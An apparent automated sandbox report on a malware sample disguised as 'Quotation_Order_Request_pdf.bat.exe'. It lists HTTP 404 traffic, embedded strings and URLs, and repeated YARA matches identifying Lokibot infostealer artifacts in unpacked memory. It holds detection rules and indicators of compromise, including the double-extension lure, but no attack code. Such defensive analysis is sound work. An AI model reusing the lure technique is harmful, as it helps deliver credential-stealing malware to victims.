Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qVjN6nB62ufzgQ2%2BBQOg0bqs3lQiXucCf5b%2FfLKRaMVFZd8gWIThMaqkVRSPerKqQ780uaNlFs61WlE949Sk288bSkPaJslE%2FmnrxwKITADiITiCvsLNPMjjwCE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec548291c424b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1565&rtt_var=782&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=63vqolKtKJChSU5jjPr1V5m4CyClg7NDHwZDM72EWEOoGRO9knkHNIKwtnrS9FwVvYIPU33YeiARiuiCuvTpeSm0IFLXTtlFsj7KrjLswBPBjfUebVHktDcz2TM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec5542eba727b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1947&min_rtt=1947&rtt_var=973&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EtpZ3dBkZEK0Pytk20MsiQGB3g%2BgVcZb81Sr7mdvqERSfohZLryyxbhkaOtjq1wzXVbUmg0L2jX262Vs27ZiwbDopZeD8VfZiPhNpTNuSAb5TjtKdYHnfMxld30%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec57b6f7dc34f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1450&min_rtt=1450&rtt_var=725&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k9iZ8MejMH6lXK0uso8GsFS2t74C1XFcJk04v8GxySiELG5RetY%2BYh5g41pRknhkKlRuFbLMZIihpxXracVKBQaq5fIUnpxLQnS8ve1QMrhrZOiF0amJSOkTCdY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec5ab092c43b3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1526&min_rtt=1526&rtt_var=763&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cxlTx%2BYfATIrpGpl%2FISv%2BhUKUzOpQ2edpY0J5Fpr3zf2Q6DG%2F2XIAZVllw8Ma5xHrZpEd8cl8dj4jVf1Nahyg7yneP4ASwvC5POxjrG7JZ6rPIqIRzKWlg3d560%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec5b71d5d43b3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1562&rtt_var=781&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BAZJB%2FsOOWZE%2FjEHNmzQ2%2Bv%2F0ghkDVIMt6GMFTZ%2FxE7BCKyhQc8AYNtJdViUXM3bLQQb4fnK9ziNdQbiOn%2B09BLhT%2Bg3q7dqy3oJiQLm9JHoa0BREOIMKx2tq%2Bw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec5cebf9343b3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1569&rtt_var=784&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vuFqwOte5v8nUK3wCwGduxDs48vIWtRU0S9dVF3hyw5A1m4Wb7k3fxr9D%2FbFjzJAes0iKww%2Bn327F3hQSdYeCPtx9kMYXj%2FLawuhr2WvwzIsDWiwQbJ%2FC0CyRn0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec5dadaf70f5b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=8232&min_rtt=8232&rtt_var=4116&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DHNk5HA5oRMZq1VKvPZx8nu3ptPw4tSNsfO4q5gVDx1ReWZ3iHRQe1FaDF9llcPcMeCiHumbsbdj0UWma6O2kqrRdNGdOqM1OiZTtBSkGSVBDprHFRZ4f8LHXtU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec5e6eaf3dc28-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1635&rtt_var=817&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:54:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IOgHV0Z3UDaJ56pjxqs1UoC26PmXkSwDQ0VDKa7u2%2Fvup7cYMU7MSrgpxYykFzs7nUNjH01VjoH4aizN7nsUgqm8nrMxfehsB4Wyd1AKd9h2t59x6Fj1Wqm4wHc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec5f2fcfa729f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1879&min_rtt=1879&rtt_var=939&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:54:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dIFJUFVQVdbBCKWEaUGl50u8emRM41gAGMIBjKqIVafmJzIVQ%2FQIo0vdEqkAqMvKVv0VJXhmck6aWDJGWB1IHkyAoUlqC6WcIuiW%2BWs6AturcXHPoiU6ATFszQQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec5ff1e5adc28-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1622&rtt_var=811&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:54:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hpmMkZfq99KtcfYo7tO7mIno%2Fxsfny41UHIVr733gG4vK6IWnBm5awcKAd8IaOHZ7%2FN9YYIW0rgMNXH3XrwXmlsgsqxgrS%2FziRWCZ4hod%2BdxNbhu37sDATOzExw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec60a7c81729f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1950&rtt_var=975&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:54:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CNlLLqPUQ5IhSX0%2Bz5JeG3CpmXHwhRps7qZ%2FZmGuOka5tbYGldzSUiQ8rb06IvNZSI2A%2F4wlMmfly%2Bhhk0jDOf3zXnEKoFr4yfOHkpbgmWz%2FaWVpIvd%2B%2BB3cqbA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec616bcd0729f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1993&rtt_var=996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:54:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GpKl51cmrqaH9TxdiZlf1W1FwnoyyVLHzLv%2B6kZ3oftoLuiTcNrxOhJ72efeHJW1mMg5QZt3SIpNzItZgRFw617hyKjC1pWYwGOJR%2FSGdIFcRrrmcor0dspDULo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec622fd51c34f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1607&rtt_var=803&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:54:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uxt0LQvgQnv8joEUyffmFJJBeM0fUunU%2FhYO19V89VP8MCa2Wc3NvhLsHLRh58KFxUaBIhbYrcWwXN1yUQKHeD8tqcI3veiRvUrvmy0M5OZ0l0qXMP9JkXfCAXI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec62f2e68862e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1994&min_rtt=1994&rtt_var=997&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:54:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xbR1jbniDT7VwExYh5SzZDJXBUxExokPWI8EUSvK7qd6eD7VF9Co5hdVoB2M39REJ3KqhgrJasRCfDcGvWGyihljVVLBHYrG4uP5iyGOZboXAqpc0xCuggMHzwY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec63b4e54424b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=66379&min_rtt=66379&rtt_var=33189&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: Quotation_Order_Request_pdf.bat.exe, bCirqu.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Quotation_Order_Request_pdf.bat.exe, bCirqu.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: Quotation_Order_Request_pdf.bat.exe, bCirqu.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1770983608.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, bCirqu.exe, 00000009.00000002.1995668525.0000000002418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bCirqu.exe, 00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp, bCirqu.exe, 00000009.00000002.1998927254.000000000348F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1778321007.0000000007552000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Quotation_Order_Request_pdf.bat.exe, bCirqu.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
